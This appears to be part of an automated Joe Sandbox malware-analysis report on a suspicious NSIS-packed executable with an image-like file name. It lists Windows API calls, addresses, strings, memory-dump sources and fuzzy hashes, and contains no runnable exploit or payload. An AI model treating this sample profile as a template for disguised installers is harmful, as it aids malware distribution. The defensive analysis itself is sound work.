                                        • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                        • DeleteObject.GDI32(00000110), ref: 00404E33
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                        • ShowWindow.USER32(?,00000005), ref: 00404F94
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                        • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                        • GlobalFree.KERNEL32(?), ref: 00405172
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                        • ShowWindow.USER32(?,00000000), ref: 0040531C
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                        • ShowWindow.USER32(00000000), ref: 0040532E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                        • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                        • Opcode Fuzzy Hash: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                        • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                        • GetSysColor.USER32(?), ref: 00404566
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                        • lstrlenA.KERNEL32(?), ref: 00404587
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                        • SendMessageA.USER32(00000000), ref: 00404610
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                        • SetCursor.USER32(00000000), ref: 00404693
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                        • SetCursor.USER32(00000000), ref: 004046AC
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: N$cD@
                                        • API String ID: 3103080414-2800326580
                                        • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                        • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                        • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                        • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                        • wsprintfA.USER32 ref: 00405F6B
                                        • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                        • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                        • GlobalFree.KERNEL32(00000000), ref: 00406054
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                        • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                        • Opcode Fuzzy Hash: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                        • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                        APIs
                                        • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                        • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                        • CharNextA.USER32(0000000C,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                        • CharPrevA.USER32(0000000C,0000000C,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        Strings
                                        • "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe", xrefs: 00406587
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                                        • *?|<>/":, xrefs: 004065CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-3907812296
                                        • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                        • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                        • GetSysColor.USER32(00000000), ref: 004043EF
                                        • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                        • SetBkMode.GDI32(?,?), ref: 00404407
                                        • GetSysColor.USER32(?), ref: 0040441A
                                        • SetBkColor.GDI32(?,?), ref: 0040442A
                                        • DeleteObject.GDI32(?), ref: 00404444
                                        • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                        • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                        APIs
                                          • Part of subcall function 6E3312A5: GlobalAlloc.KERNEL32(00000040,6E3312C3,?,6E33135F,-6E33504B,6E3311C0,-000000A0), ref: 6E3312AD
                                        • GlobalFree.KERNEL32(?), ref: 6E33266E
                                        • GlobalFree.KERNEL32(00000000), ref: 6E3326A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                        • GetMessagePos.USER32 ref: 00404CA3
                                        • ScreenToClient.USER32(?,?), ref: 00404CBD
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                        • MulDiv.KERNEL32(000B2A08,00000064,000B2A0C), ref: 00402E90
                                        • wsprintfA.USER32 ref: 00402EA0
                                        • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402E9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 6E3324D7
                                          • Part of subcall function 6E3312B4: lstrcpynA.KERNEL32(00000000,?,6E33135F,-6E33504B,6E3311C0,-000000A0), ref: 6E3312C4
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E332452
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6E332467
                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6E332478
                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 6E332486
                                        • GlobalFree.KERNEL32(00000000), ref: 6E33248D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        Similarity
                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                        • String ID:
                                        • API String ID: 3730416702-0
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                        • GlobalFree.KERNEL32(?), ref: 004028C9
                                        • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        Similarity
                                        • API ID: FreeGlobal
                                        • String ID:
                                        • API String ID: 2979337801-0
                                        APIs
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401DA3
                                        • GetClientRect.USER32(?,?), ref: 00401DF1
                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                        • DeleteObject.GDI32(00000000), ref: 00401E45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E5D
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                        • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        APIs
                                        • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                        • wsprintfA.USER32 ref: 00404C1C
                                        • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        APIs
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405CC6
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb535E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405D60
                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb535E.tmp
                                        • API String ID: 3248276644-2198462938
                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                                        • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                        • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                                        • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                        • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                                        APIs
                                        • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405CC6
